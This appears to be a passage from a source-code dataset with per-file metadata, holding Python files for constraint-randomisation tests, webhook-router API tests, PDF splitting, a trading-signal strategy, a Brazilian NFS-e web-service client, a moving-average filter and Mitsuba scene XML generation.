self.queue = vsc.randsz_list_t(vsc.bit_t(8))
def test_randsz_smoke(self):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.l = vsc.randsz_list_t(vsc.uint8_t())
@vsc.constraint
def l_c(self):
self.l.size in vsc.rangelist(vsc.rng(2,10))
self.l[1] == (self.l[0]+1)
it = my_item_c()
it.randomize()
print("it.l.size=" + str(it.l.size))
for i,v in enumerate(it.l):
print("v[" + str(i) + "] = " + str(v))
self.assertEqual(it.l[1], it.l[0]+1)
def test_randsz_len(self):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.l = vsc.randsz_list_t(vsc.uint8_t())
@vsc.constraint
def l_c(self):
self.l.size in vsc.rangelist(vsc.rng(2,10))
self.l[1] == (self.l[0]+1)
it = my_item_c()
it.randomize()
self.assertGreaterEqual(len(it.l), 2)
self.assertLessEqual(len(it.l), 10)
print("it.l.size=" + str(it.l.size))
for i,v in enumerate(it.l):
print("v[" + str(i) + "] = " + str(v))
self.assertEqual(it.l[1], it.l[0]+1)
def test_randsz_foreach_idx(self):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.l = vsc.randsz_list_t(vsc.uint8_t())
self.a = vsc.rand_uint8_t()
@vsc.constraint
def l_c(self):
self.l.size in vsc.rangelist(vsc.rng(2,10))
with vsc.foreach(self.l, it=False, idx=True) as idx:
with vsc.if_then(idx > 0):
self.l[idx] == self.l[idx-1]+1
it = my_item_c()
it.randomize()
for i in range(len(it.l)):
if i > 0:
self.assertEqual(it.l[i], it.l[i-1]+1)
def test_fixedsz_foreach_idx(self):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
self.temp = vsc.list_t(vsc.uint8_t())
self.temp = [1,3,4,12,13,14]
@vsc.constraint
def ab_c(self):
self.a in vsc.rangelist(1,2,3)
with vsc.foreach(self.temp, idx=True) as i:
self.a != self.temp[i]
it = my_item_c()
for i in range(10):
it.randomize()
self.assertEqual(it.a, 2)
def disabled_test_sum_simple(self):
@vsc.randobj
class my_item_c(object):
def __init__(self):
self.l = vsc.rand_list_t(vsc.uint8_t(), sz=5)
self.a = vsc.rand_uint8_t()
@vsc.constraint
def sum_c(self):
self.l.sum == 5
with vsc.foreach(self.l) as it:
it != 0
it = my_item_c()
it.randomize()
print("Model: " + ModelPrettyPrinter.print(it.get_model()))
self.assertEqual(it.l.sum, 5)
| 27.726027
| 68
| 0.447381
| 3,873
| 0.956769
| 0
| 0
| 2,376
| 0.586957
| 0
| 0
| 103
| 0.025445
|
a1e5a8c1e742d2b35abb789d741addea637b7ba0
| 5,344
|
py
|
Python
|
config-server/test.py
|
wtsi-hgi/webhook-router
|
a36987055ec4c1bcb443d391807c6469e3d21ba8
|
[
"MIT"
] | 2
|
2017-11-21T11:16:44.000Z
|
2022-01-05T23:17:50.000Z
|
config-server/test.py
|
wtsi-hgi/webhook-router
|
a36987055ec4c1bcb443d391807c6469e3d21ba8
|
[
"MIT"
] | 14
|
2017-10-17T16:05:39.000Z
|
2022-02-12T02:42:49.000Z
|
config-server/test.py
|
wtsi-hgi/webhook-router
|
a36987055ec4c1bcb443d391807c6469e3d21ba8
|
[
"MIT"
] | null | null | null |
import json
from configserver import ConfigServer, get_postgres_db
from configserver.errors import InvalidRouteUUIDError
from flask.testing import FlaskClient
import pytest
from peewee import SqliteDatabase
import logging
from uuid import uuid4
import functools
from typing import Iterable
@pytest.fixture(autouse=True)
def no_logs():
logging.getLogger().setLevel(logging.WARNING)
@pytest.fixture()
def webhook_server():
with open("config.json") as config_file:
config_JSON = json.load(config_file)
server = ConfigServer(
use_test_auth=True,
db=get_postgres_db(),
config_JSON=config_JSON
)
yield server
server.close()
@pytest.fixture()
def user_auth():
return {
"headers": {
"user": f"test_user{uuid4()}@example.ac.uk"
}
}
@pytest.fixture()
def router_app(webhook_server, user_auth):
test_client = webhook_server.app.app.test_client() # type: FlaskClient
class PatchedFlaskClient:
get = functools.partialmethod(test_client.get, **user_auth)
delete = functools.partialmethod(test_client.delete, **user_auth)
post = functools.partialmethod(test_client.post, **user_auth)
patch = functools.partialmethod(test_client.patch, **user_auth)
return PatchedFlaskClient
@pytest.fixture()
def test_route_uuid(webhook_server: ConfigServer, router_app: FlaskClient) -> Iterable[str]:
create_route_resp = router_app.post(
"/create-route",
data=json.dumps({
"name": "route",
"destination": "http://127.0.0.1"
}),
content_type='application/json'
)
uuid = json.loads(create_route_resp.data)["uuid"]
try:
yield uuid
finally:
router_app.delete(f"/routes/{uuid}")
def test_create_route(router_app: FlaskClient):
create_route_resp = router_app.post(
"/create-route",
data=json.dumps({
"name": "route",
"destination": "http://127.0.0.1"
}),
content_type='application/json'
)
assert create_route_resp.status_code == 201
def test_get(router_app: FlaskClient, test_route_uuid: str):
assert router_app.get(f"/routes/{test_route_uuid}").status_code == 200
def test_get_by_token(router_app: FlaskClient, test_route_uuid: str):
token = json.loads(router_app.get(f"/routes/{test_route_uuid}").data)["token"]
assert router_app.get(f"/routes/token/{token}").status_code == 200
def test_patch(router_app: FlaskClient, test_route_uuid: str):
assert router_app.patch(
f"/routes/{test_route_uuid}",
data=json.dumps({
"name": "new-name"
}),
content_type='application/json',
).status_code == 204
assert json.loads(router_app.get(f"/routes/{test_route_uuid}").data)["name"] == "new-name"
@pytest.mark.usefixtures("test_route_uuid")
def test_get_all(router_app: FlaskClient):
all_routes_resp = router_app.get("/routes")
assert all_routes_resp.status_code == 200
data = json.loads(all_routes_resp.data)
assert len(data) == 1 and data[0]["name"] == "route"
def test_delete(router_app: FlaskClient, test_route_uuid: str):
assert router_app.delete(f"/routes/{test_route_uuid}").status_code == 204
assert router_app.get(f"/routes/{test_route_uuid}").status_code == 404
def test_regenerate(router_app: FlaskClient, test_route_uuid: str):
prev_token = json.loads(router_app.get(f"/routes/{test_route_uuid}").data)["token"]
resp = router_app.post(f"/routes/{test_route_uuid}/regenerate")
assert resp.status_code == 200
assert json.loads(resp.data)["token"] != prev_token
def test_add_user_link(router_app: FlaskClient, test_route_uuid: str):
test_auth = {
"headers": {
"user": "other_user-p@example.com"
}
}
assert router_app.post(f"/links/{test_route_uuid}", **test_auth).status_code == 201
assert len(json.loads(router_app.get("/routes", **test_auth).data)) == 1
def test_get_user_link(router_app: FlaskClient, test_route_uuid: str):
test_auth = {
"headers": {
"user": "other_user-p@example.com"
}
}
assert router_app.get(f"/links/{test_route_uuid}", **test_auth).status_code == 404
assert router_app.get(f"/links/{test_route_uuid}").status_code == 200
def test_remove_user_link(router_app: FlaskClient, test_route_uuid: str):
test_auth = {
"headers": {
"user": "other_user-p@example.com"
}
}
test_add_user_link(router_app, test_route_uuid)
assert router_app.delete(f"/links/{test_route_uuid}", **test_auth).status_code == 204
assert len(json.loads(router_app.get("/routes", **test_auth).data)) == 0
def test_get_route_stats(router_app: FlaskClient, test_route_uuid: str):
assert router_app.get(f"/routes/{test_route_uuid}/statistics").status_code == 200
def test_get_route_logs(router_app: FlaskClient, test_route_uuid: str):
assert router_app.get(f"/routes/{test_route_uuid}/logs").status_code == 200
@pytest.mark.usefixtures("test_route_uuid")
def test_all_routes_stats(router_app: FlaskClient):
assert router_app.get(f"/routes/statistics").status_code == 200
def test_all_routes_stats_with_no_stats(router_app: FlaskClient):
assert router_app.get(f"/routes/statistics").status_code == 200
| 31.621302
| 94
| 0.691804
| 309
| 0.057822
| 730
| 0.136602
| 1,927
| 0.360591
| 0
| 0
| 1,008
| 0.188623
|
a1e5ccbd0c595e22be2f8bf21bf5897f8d70355d
| 1,318
|
py
|
Python
|
Scripts/spliter.py
|
sawa25/PDFs-TextExtract
|
bdc4469deab8b023135165ce8dbc63577927a508
|
[
"MIT"
] | 87
|
2020-05-08T00:04:17.000Z
|
2022-03-27T11:39:04.000Z
|
Scripts/spliter.py
|
tzo13123/PDFs-TextExtract
|
3d00b7b4007557e1467fb5aca8bf8e37513de124
|
[
"MIT"
] | 5
|
2020-06-24T13:22:37.000Z
|
2021-04-10T21:39:32.000Z
|
Scripts/spliter.py
|
tzo13123/PDFs-TextExtract
|
3d00b7b4007557e1467fb5aca8bf8e37513de124
|
[
"MIT"
] | 49
|
2020-05-08T00:08:01.000Z
|
2022-02-04T21:04:03.000Z
|
import os
from PyPDF2 import PdfFileReader, PdfFileWriter
#Solution based on two functions:
#1. pdf_remove   : Remove existing pdf documents (the result of your last split operation).
#2. pdf_splitter : Split your main pdf document into a group of documents.
def pdf_remove (length):
for i in range(length):
        os.remove("../PDFs-TextExtract/split/{}".format(fname[i]))  # Remove existing pdf documents from the folder.
print("Deleted: ../PDFs-TextExtract/split/{}".format(fname[i]))
def pdf_splitter(path):
fname = os.path.splitext(os.path.basename(path))[0]
pdf = PdfFileReader(path)
for page in range(pdf.getNumPages()):
pdf_writer = PdfFileWriter()
pdf_writer.addPage(pdf.getPage(page))
output_filename = '../PDFs-TextExtract/split/{}.pdf'.format(page+1)
with open(output_filename, 'wb') as out:
pdf_writer.write(out)
print('Created: {}'.format(output_filename))
if __name__ == '__main__':
    path = '../PDFs-TextExtract/pdf_merged.pdf'  # specify your main pdf document path.
    fname = os.listdir('../PDFs-TextExtract/split/')  # fname: list containing the pdf document names in the folder
    length = len(fname)  # retrieve the length of the list fname.
#call pdf remove function
pdf_remove(length)
#call pdf splitter function
pdf_splitter(path)
| 32.95
| 107
| 0.69044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 588
| 0.446131
|
a1e6051e4e110799735dcb4615879dd95634d238
| 107
|
py
|
Python
|
swagger_client/apis/__init__.py
|
sendx/sendx-api-python
|
edce9755d3718efb12cb5493da7cbac961cb1d9b
|
[
"Apache-2.0"
] | null | null | null |
swagger_client/apis/__init__.py
|
sendx/sendx-api-python
|
edce9755d3718efb12cb5493da7cbac961cb1d9b
|
[
"Apache-2.0"
] | null | null | null |
swagger_client/apis/__init__.py
|
sendx/sendx-api-python
|
edce9755d3718efb12cb5493da7cbac961cb1d9b
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
# import apis into api package
from .contact_api import ContactApi
| 21.4
| 38
| 0.841121
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 30
| 0.280374
|
a1e9308fe3ee5db7d2721276c33a44e2c57e6e80
| 3,915
|
py
|
Python
|
strategy/overreact_strategy.py
|
tseng1026/SideProject-Investment
|
e7135e667cdee16d1d754ca0f9ebd88226083e66
|
[
"MIT"
] | null | null | null |
strategy/overreact_strategy.py
|
tseng1026/SideProject-Investment
|
e7135e667cdee16d1d754ca0f9ebd88226083e66
|
[
"MIT"
] | null | null | null |
strategy/overreact_strategy.py
|
tseng1026/SideProject-Investment
|
e7135e667cdee16d1d754ca0f9ebd88226083e66
|
[
"MIT"
] | null | null | null |
from typing import Callable
import numpy as np
from constants.constants import IndicatorType
from strategy.base import BaseStrategy
class OverReactStrategy(BaseStrategy):
def trade_by_indicator(
self, indicator_type: IndicatorType) -> Callable[[], np.ndarray]:
""" Get trading strategy function."""
if (indicator_type == IndicatorType.RSI):
return self.trade_by_rsi
elif (indicator_type == IndicatorType.MFI):
return self.trade_by_mfi
elif (indicator_type == IndicatorType.WILLR):
return self.trade_by_willr
else:
raise Exception("The strategy logic is unsupported.")
def trade_by_mfi(
self,
timeperiod: int = 14,
lowerbound: float = 30,
upperbound: float = 70,
) -> np.ndarray:
""" Consider overreact duration to be trading time.
1. buy when mfi is smaller than lower bound
2. sell when mfi is larger than upper bound
args:
timeperiod (int) [unit: times of the data interval]
lowerbound (float) the lower threshold implies oversold
upperbound (float) the upper threshold implies overbought
returns:
            signal (np.ndarray): signal for trading points
(1 for buying and -1 for selling)
"""
mfi = self.indicator.mfi(timeperiod=timeperiod)
return self._get_signals(mfi,
lowerbound=lowerbound, upperbound=upperbound)
def trade_by_rsi(
self,
timeperiod: int = 14,
lowerbound: float = 30,
upperbound: float = 70,
) -> np.ndarray:
""" Consider overreact duration to be trading time.
1. buy when rsi is smaller than lower bound
2. sell when rsi is larger than upper bound
args:
timeperiod (int) [unit: times of the data interval]
lowerbound (float) the lower threshold implies oversold
upperbound (float) the upper threshold implies overbought
returns:
            signal (np.ndarray): signal for trading points
(1 for buying and -1 for selling)
"""
rsi = self.indicator.rsi(timeperiod=timeperiod)
return self._get_signals(rsi,
lowerbound=lowerbound, upperbound=upperbound)
def trade_by_willr(
self,
timeperiod: int = 14,
lowerbound: float = 30,
upperbound: float = 70,
) -> np.ndarray:
""" Consider overreact duration to be trading time.
1. buy when willr is smaller than lower bound
2. sell when willr is larger than upper bound
args:
timeperiod (int) [unit: times of the data interval]
lowerbound (float) the lower threshold implies oversold
upperbound (float) the upper threshold implies overbought
returns:
            signal (np.ndarray): signal for trading points
(1 for buying and -1 for selling)
"""
willr = self.indicator.willr(timeperiod=timeperiod)
return self._get_signals(willr,
lowerbound=lowerbound, upperbound=upperbound)
def _get_signals(
self,
line: np.ndarray,
lowerbound: float,
upperbound: float,
) -> np.ndarray:
"""
args:
line (np.ndarray): line, e.g. 10 MA
lowerbound (float): threshold for oversold
upperbound (float): threshold for overbought
returns:
            signal (np.ndarray): signal for trading points
(1 for buying and -1 for selling)
"""
signal_buy = line < lowerbound
signal_sell = line > upperbound
return self._combine_signals(signal_buy, signal_sell)
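
# ---------------------------------------------------------------------------
# Illustrative usage sketch (editor addition, not part of the original module).
# The BaseStrategy constructor is not shown in this file, so the argument below
# is an assumption; trade_by_indicator / trade_by_rsi and their defaults come
# from the class above.
def _example_overreact_usage(price_data) -> np.ndarray:
    """Hypothetical helper: build a strategy and get RSI-based signals."""
    strategy = OverReactStrategy(price_data)  # assumed constructor arguments
    trade_fn = strategy.trade_by_indicator(IndicatorType.RSI)
    # 1 marks a buy (oversold, RSI < lowerbound), -1 a sell (overbought, RSI > upperbound)
    return trade_fn(timeperiod=14, lowerbound=30, upperbound=70)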
| 35.590909
| 78
| 0.585951
| 3,778
| 0.965006
| 0
| 0
| 0
| 0
| 0
| 0
| 2,014
| 0.514432
|
a1ed273b2e4ad00a56a2ecb5eabb664805ce9cd8
| 12,746
|
py
|
Python
|
src/erpbrasil/edoc/provedores/issnet.py
|
Engenere/erpbrasil.edoc
|
2e835cc191407a8261c6f27933b7660d74b5a691
|
[
"MIT"
] | 8
|
2019-09-27T05:59:06.000Z
|
2022-01-16T21:04:04.000Z
|
src/erpbrasil/edoc/provedores/issnet.py
|
Engenere/erpbrasil.edoc
|
2e835cc191407a8261c6f27933b7660d74b5a691
|
[
"MIT"
] | 18
|
2020-10-05T19:23:59.000Z
|
2022-02-22T11:39:22.000Z
|
src/erpbrasil/edoc/provedores/issnet.py
|
Engenere/erpbrasil.edoc
|
2e835cc191407a8261c6f27933b7660d74b5a691
|
[
"MIT"
] | 10
|
2019-11-28T14:03:02.000Z
|
2022-02-25T14:06:14.000Z
|
# coding=utf-8
# Copyright (C) 2020 - TODAY, Marcel Savegnago - Escodoo
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import xml.etree.ElementTree as ET
from datetime import datetime
from erpbrasil.base import misc
from erpbrasil.edoc.nfse import NFSe
from erpbrasil.edoc.nfse import ServicoNFSe
try:
from nfselib.issnet.v1_00 import servico_cancelar_nfse_envio
from nfselib.issnet.v1_00 import servico_consultar_lote_rps_envio
from nfselib.issnet.v1_00 import servico_consultar_lote_rps_resposta
from nfselib.issnet.v1_00 import servico_consultar_nfse_rps_envio
from nfselib.issnet.v1_00 import servico_consultar_situacao_lote_rps_envio
from nfselib.issnet.v1_00 import servico_consultar_situacao_lote_rps_resposta
from nfselib.issnet.v1_00 import servico_enviar_lote_rps_resposta
issnet = True
except ImportError:
issnet = False
cidade = {
3543402: 'ribeiraopreto', # Ribeirão Preto - SP
3301702: 'duquedecaxias', # Duque de Caxias - RJ
}
endpoint = 'servicos.asmx?WSDL'
if issnet:
servicos = {
'envia_documento': ServicoNFSe(
'RecepcionarLoteRps',
endpoint, servico_enviar_lote_rps_resposta, True),
'consulta_recibo': ServicoNFSe(
'ConsultarSituacaoLoteRPS',
endpoint, servico_consultar_situacao_lote_rps_resposta, True),
'consultar_lote_rps': ServicoNFSe(
'ConsultarLoteRps',
endpoint, servico_consultar_lote_rps_resposta, True),
'cancela_documento': ServicoNFSe(
'CancelarNfse',
endpoint, servico_cancelar_nfse_envio, True),
'consulta_nfse_rps': ServicoNFSe(
'ConsultarNFSePorRPS',
endpoint, servico_consultar_nfse_rps_envio, True),
}
else:
servicos = ()
class Issnet(NFSe):
_header = None
def __init__(self, transmissao, ambiente, cidade_ibge, cnpj_prestador,
im_prestador):
if ambiente == '2':
self._url = 'https://www.issnetonline.com.br/webserviceabrasf/homologacao/'
else:
self._url = 'https://www.issnetonline.com.br/webserviceabrasf/' + cidade[int(cidade_ibge)] + '/'
self._servicos = servicos
super(Issnet, self).__init__(
transmissao, ambiente, cidade_ibge, cnpj_prestador, im_prestador)
def get_documento_id(self, edoc):
# edoc.LoteRps.ListaRps.Rps[0].InfRps.Id
return edoc.LoteRps.id, edoc.LoteRps.NumeroLote
def _prepara_envia_documento(self, edoc):
numero_lote = self._gera_numero_lote()
edoc.LoteRps.id = 'lote' + numero_lote
edoc.LoteRps.NumeroLote = int(numero_lote)
        #
        # Sign all the RPS entries and the batch (Lote)
        #
xml_assinado = edoc
        # for rps in edoc.LoteRps.ListaRps.Rps:
        #     xml_assinado = self.assina_raiz(xml_assinado, rps.InfRps.Id, getchildren=True)
        # Sign the batch (lote)
        # xml_assinado = self.assina_raiz(xml_assinado, edoc.LoteRps.Id)
        # for rps in edoc.LoteRps.ListaRps.Rps:
        #     xml_assinado = self.assina_raiz(xml_assinado, rps.InfRps.Id)
        # Sign the batch (lote)
xml_assinado = self.assina_raiz(xml_assinado, edoc.LoteRps.id)
xml_assinado = '<?xml version="1.0"?>' + xml_assinado
return xml_assinado
def _prepara_consulta_recibo(self, proc_envio):
raiz = servico_consultar_situacao_lote_rps_envio.ConsultarSituacaoLoteRpsEnvio(
# Id=self._gera_numero_lote(),
Prestador=servico_consultar_situacao_lote_rps_envio.tcIdentificacaoPrestador(
CpfCnpj=servico_consultar_situacao_lote_rps_envio.tcCpfCnpj(
Cnpj=self.cnpj_prestador,
),
InscricaoMunicipal=self.im_prestador
),
Protocolo=proc_envio.resposta.Protocolo
)
# xml_assinado = self.assina_raiz(raiz,"")
xml_string, xml_etree = self._generateds_to_string_etree(raiz)
xml_string = '<?xml version="1.0"?>' + xml_string
return xml_string
def _prepara_consultar_lote_rps(self, protocolo):
raiz = servico_consultar_lote_rps_envio.ConsultarLoteRpsEnvio(
# Id=self._gera_numero_lote(),
Prestador=servico_consultar_lote_rps_envio.tcIdentificacaoPrestador(
CpfCnpj=servico_consultar_lote_rps_envio.tcCpfCnpj(
Cnpj=self.cnpj_prestador,
),
InscricaoMunicipal=self.im_prestador
),
Protocolo=protocolo
)
# xml_assinado = self.assina_raiz(raiz, raiz.Id)
xml_string, xml_etree = self._generateds_to_string_etree(raiz)
xml_string = '<?xml version="1.0"?>' + xml_string
return xml_string
def _verifica_resposta_envio_sucesso(self, proc_envio):
if proc_envio.resposta.Protocolo:
return True
return False
def _edoc_situacao_em_processamento(self, proc_recibo):
if proc_recibo.resposta.Situacao == 2:
return True
return False
def _prepara_cancelar_nfse_envio(self, doc_numero):
raiz = servico_cancelar_nfse_envio.tcPedidoCancelamento(
InfPedidoCancelamento=servico_cancelar_nfse_envio.tcInfPedidoCancelamento(
id=doc_numero,
IdentificacaoNfse=servico_cancelar_nfse_envio.tcIdentificacaoNfse(
Numero=doc_numero,
Cnpj=self.cnpj_prestador,
InscricaoMunicipal=self.im_prestador,
CodigoMunicipio=self.cidade
if self.ambiente == '1'
else 999,
),
CodigoCancelamento='0001'
)
)
        # Coded this way because the signature has to sit inside the Pedido tag. This could probably be improved.
pedido = self.assina_raiz(raiz, '')
xml_assinado = '<?xml version="1.0"?>' \
'<p1:CancelarNfseEnvio ' \
'xmlns:p1="http://www.issnetonline.com.br/webserviceabrasf/vsd/servico_cancelar_nfse_envio.xsd" ' \
'xmlns:tc="http://www.issnetonline.com.br/webserviceabrasf/vsd/tipos_complexos.xsd" ' \
'xmlns:ts="http://www.issnetonline.com.br/webserviceabrasf/vsd/tipos_simples.xsd">' \
+ pedido + '</p1:CancelarNfseEnvio>'
xml_assinado = xml_assinado.replace('tcPedidoCancelamento', 'Pedido')
return xml_assinado
def _prepara_consultar_nfse_rps(self, **kwargs):
rps_numero = kwargs.get('rps_number')
rps_serie = kwargs.get('rps_serie')
rps_tipo = kwargs.get('rps_type')
raiz = servico_consultar_nfse_rps_envio.ConsultarNfseRpsEnvio(
IdentificacaoRps=servico_consultar_nfse_rps_envio.tcIdentificacaoRps(
Numero=rps_numero,
Serie=rps_serie,
Tipo=rps_tipo,
),
Prestador=servico_consultar_nfse_rps_envio.tcIdentificacaoPrestador(
CpfCnpj=servico_consultar_nfse_rps_envio.tcCpfCnpj(
Cnpj=self.cnpj_prestador,
),
InscricaoMunicipal=self.im_prestador
),
)
xml_string, xml_etree = self._generateds_to_string_etree(raiz)
xml_string = '<?xml version="1.0"?>' + xml_string
return xml_string
def analisa_retorno_consulta(self, processo, number, company_cnpj_cpf,
company_legal_name):
mensagem = ''
res = {}
retorno = ET.fromstring(processo.retorno)
nsmap = {'consulta': 'http://www.issnetonline.com.br/webserviceabrasf/vsd/'
'servico_consultar_nfse_rps_resposta.xsd',
'tc': 'http://www.issnetonline.com.br/webserviceabrasf/vsd/'
'tipos_complexos.xsd'}
if processo.webservice == 'ConsultarNFSePorRPS':
enviado = retorno.findall(
".//consulta:CompNfse", namespaces=nsmap)
nao_encontrado = retorno.findall(
".//consulta:MensagemRetorno", namespaces=nsmap)
if enviado:
                # the NFS-e has already been sent
cancelada = retorno.findall(
".//consulta:NfseCancelamento", namespaces=nsmap)
if cancelada:
                    # the sent NFS-e has been cancelled
data = retorno.findall(
".//consulta:DataHora", namespaces=nsmap)[0].text
data = datetime.strptime(data, '%Y-%m-%dT%H:%M:%S'). \
strftime("%m/%d/%Y")
mensagem = 'NFS-e cancelada em ' + data
else:
numero_retorno = \
retorno.findall(".//tc:InfNfse/tc:Numero",
namespaces=nsmap)[0].text
cnpj_prestador_retorno = retorno.findall(
".//tc:IdentificacaoPrestador/tc:CpfCnpj/tc:Cnpj",
namespaces=nsmap)[0].text
razao_social_prestador_retorno = retorno.findall(
".//tc:PrestadorServico/tc:RazaoSocial",
namespaces=nsmap)[0].text
verify_code = \
retorno.findall(".//tc:InfNfse/tc:CodigoVerificacao",
namespaces=nsmap)[0].text
authorization_date = \
retorno.findall(".//tc:InfNfse/tc:DataEmissao",
namespaces=nsmap)[0].text
variables_error = []
if number and numero_retorno != number:
variables_error.append('Número')
if cnpj_prestador_retorno != misc.punctuation_rm(
company_cnpj_cpf):
variables_error.append('CNPJ do prestador')
if razao_social_prestador_retorno != company_legal_name:
variables_error.append('Razão Social de prestador')
if variables_error:
mensagem = 'Os seguintes campos não condizem com' \
' o provedor NFS-e: \n'
mensagem += '\n'.join(variables_error)
else:
mensagem = "NFS-e enviada e corresponde com o provedor"
res['codigo_verificacao'] = verify_code
res['numero'] = numero_retorno
res['data_emissao'] = authorization_date
return mensagem, res
elif nao_encontrado:
                # the NFS-e has not been sent
mensagem_erro = retorno.findall(
".//tc:Mensagem", namespaces=nsmap)[0].text
correcao = retorno.findall(
".//tc:Correcao", namespaces=nsmap)[0].text
codigo = retorno.findall(
".//tc:Codigo", namespaces=nsmap)[0].text
mensagem = (codigo + ' - ' + mensagem_erro + ' - Correção: ' +
correcao + '\n')
else:
mensagem = 'Erro desconhecido.'
return mensagem
def analisa_retorno_cancelamento(self, processo):
if processo.webservice in ['CancelarNfse']:
mensagem_completa = ''
situacao = True
retorno = ET.fromstring(processo.retorno)
sucesso = retorno.findall(
".//{http://www.issnetonline.com.br/webserviceabrasf/vsd/"
"tipos_complexos.xsd}Sucesso")
if not sucesso:
mensagem_erro = retorno.findall(
".//{http://www.issnetonline.com.br/webserviceabrasf/vsd/"
"tipos_complexos.xsd}Mensagem")[
0].text
correcao = retorno.findall(
".//{http://www.issnetonline.com.br/webserviceabrasf/vsd/"
"tipos_complexos.xsd}Correcao")[
0].text
codigo = retorno.findall(
".//{http://www.issnetonline.com.br/webserviceabrasf/vsd/"
"tipos_complexos.xsd}Codigo")[
0].text
mensagem_completa += (
codigo + ' - ' +
mensagem_erro
)
if correcao:
mensagem_completa += (' - Correção: ' + correcao + '\n')
situacao = False
return situacao, mensagem_completa
| 40.722045
| 122
| 0.581751
| 10,899
| 0.854421
| 0
| 0
| 0
| 0
| 0
| 0
| 2,950
| 0.231264
|
a1ed89cc5c2446b1fe11b61f094fef9e3b0b2652
| 1,647
|
py
|
Python
|
python/filter_MA.py
|
vsellemi/macroeconomic-forecasting
|
a5ad1b88daae084f258c0f5e5b9bd9d145934375
|
[
"MIT"
] | 3
|
2021-11-29T11:18:40.000Z
|
2021-12-21T15:05:06.000Z
|
python/filter_MA.py
|
vsellemi/macroeconomic-forecasting
|
a5ad1b88daae084f258c0f5e5b9bd9d145934375
|
[
"MIT"
] | null | null | null |
python/filter_MA.py
|
vsellemi/macroeconomic-forecasting
|
a5ad1b88daae084f258c0f5e5b9bd9d145934375
|
[
"MIT"
] | 4
|
2021-11-29T11:18:48.000Z
|
2021-12-22T01:36:59.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 7 14:40:40 2021
@author: victorsellemi
"""
import numpy as np
def filter_MA(Y,q = 2):
"""
DESCRIPTION:
Decompose a time series into a trend and stationary component
using the moving average (MA) filter (i.e., low pass filter)
INPUT:
Y = (T x 1) vector of time series data
q = scalar value of moving average (half) window: default = 2
OUTPUT:
trend = (T x 1) vector of trend component of the time series, i.e., low frequency component
    signal = (T x 1) vector of the stationary part of the time series
"""
# length of time series
T = Y.shape[0]
# window width
Q = 2*q
# border of the series is preserved
p1 = np.concatenate((np.eye(q), np.zeros((q,T-q))), axis = 1)
p2 = np.zeros((T-Q,T))
p3 = np.concatenate((np.zeros((q,T-q)), np.eye(q)), axis = 1)
P = np.concatenate((p1,p2,p3), axis = 0)
# part of the series to be averaged
X = np.eye(T-Q)
Z = np.zeros((T-Q,1))
for i in range(Q):
# update X
X = np.concatenate((X, np.zeros((T-Q,1))), axis = 1) + np.concatenate((Z, np.eye(T-Q)), axis = 1)
# update Z
Z = np.concatenate((Z, np.zeros((T-Q,1))), axis = 1)
X = np.concatenate((np.zeros((q,T)), X, np.zeros((q,T))), axis = 0)
# construct linear filter
L = P + (1/(Q+1)) * X
# construct the trend
trend = L.dot(Y)
# construct stationary component
signal = Y - trend
return trend,signal
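
# ---------------------------------------------------------------------------
# Illustrative usage sketch (editor addition): away from the borders the filter
# computes trend_t = (1/(2q+1)) * sum_{j=-q..q} Y_{t+j}, while the first and
# last q points are kept unchanged. The synthetic series below is made up
# purely for demonstration; filter_MA itself is defined above.
if __name__ == "__main__":
    T = 200
    t = np.arange(T)
    y = (0.05 * t + np.sin(2 * np.pi * t / 50) + 0.3 * np.random.randn(T)).reshape(-1, 1)
    trend, signal = filter_MA(y, q=4)   # half-window q=4 -> 9-point moving average
    print(trend.shape, signal.shape)    # both (200, 1); trend + signal recovers y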
| 24.58209
| 105
| 0.538555
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 821
| 0.498482
|
a1ed8f64fdb7a590a23d44e6a7e10803d5c52975
| 3,480
|
py
|
Python
|
LightFields/xmlFiles/generateXMLFiles.py
|
sudarshannagesh90/OptimizationDeepLearningImageProcessing
|
36ab96ce29a2403166f8f176eb84062c2db7cc6e
|
[
"MIT"
] | null | null | null |
LightFields/xmlFiles/generateXMLFiles.py
|
sudarshannagesh90/OptimizationDeepLearningImageProcessing
|
36ab96ce29a2403166f8f176eb84062c2db7cc6e
|
[
"MIT"
] | null | null | null |
LightFields/xmlFiles/generateXMLFiles.py
|
sudarshannagesh90/OptimizationDeepLearningImageProcessing
|
36ab96ce29a2403166f8f176eb84062c2db7cc6e
|
[
"MIT"
] | null | null | null |
import xml.etree.ElementTree as etree
import xml.dom.minidom
import subprocess
import os
import imageio
import h5py
import numpy as np
def createXMLstring(filename,scaleVal,cameraPosX,cameraPosY):
scene = etree.Element("scene",version="0.5.0")
sensor = etree.SubElement(scene, "sensor", type="perspective")
sensor_transform = etree.SubElement(sensor,"transform",name="toWorld")
etree.SubElement(sensor_transform,"lookat",origin=str(5)+","+cameraPosX+","+cameraPosY,target="0,0,0",up="0,1,0")
sensor_sampler = etree.SubElement(sensor,"sampler",type="ldsampler")
etree.SubElement(sensor_sampler,"integer",name="sampleCount",value="128")
sensor_film = etree.SubElement(sensor,"film",type="ldrfilm")
etree.SubElement(sensor_film,"boolean",name="banner",value="false")
etree.SubElement(sensor_film,"integer",name="width",value="400")
etree.SubElement(sensor_film,"integer",name="height",value="400")
shapeObj = etree.SubElement(scene,"shape",type="obj")
shapeObj_string = etree.SubElement(shapeObj,"string",name="filename",value=filename+".obj")
shapeObj_transform = etree.SubElement(shapeObj,"transform",name="toWorld")
etree.SubElement(shapeObj_transform,"scale",value=scaleVal)
etree.SubElement(shapeObj_transform,"rotate",angle="60",y="1")
rough_string = etree.tostring(scene, "utf-8")
reparsed = xml.dom.minidom.parseString(rough_string)
reparsed_pretty = reparsed.toprettyxml(indent=" " * 4)
return reparsed_pretty
def create_h5(data, label, path, file_name):
with h5py.File(os.path.join(path, file_name), 'w') as file:
file.create_dataset("data", data = data)
file.create_dataset("label", data = label)
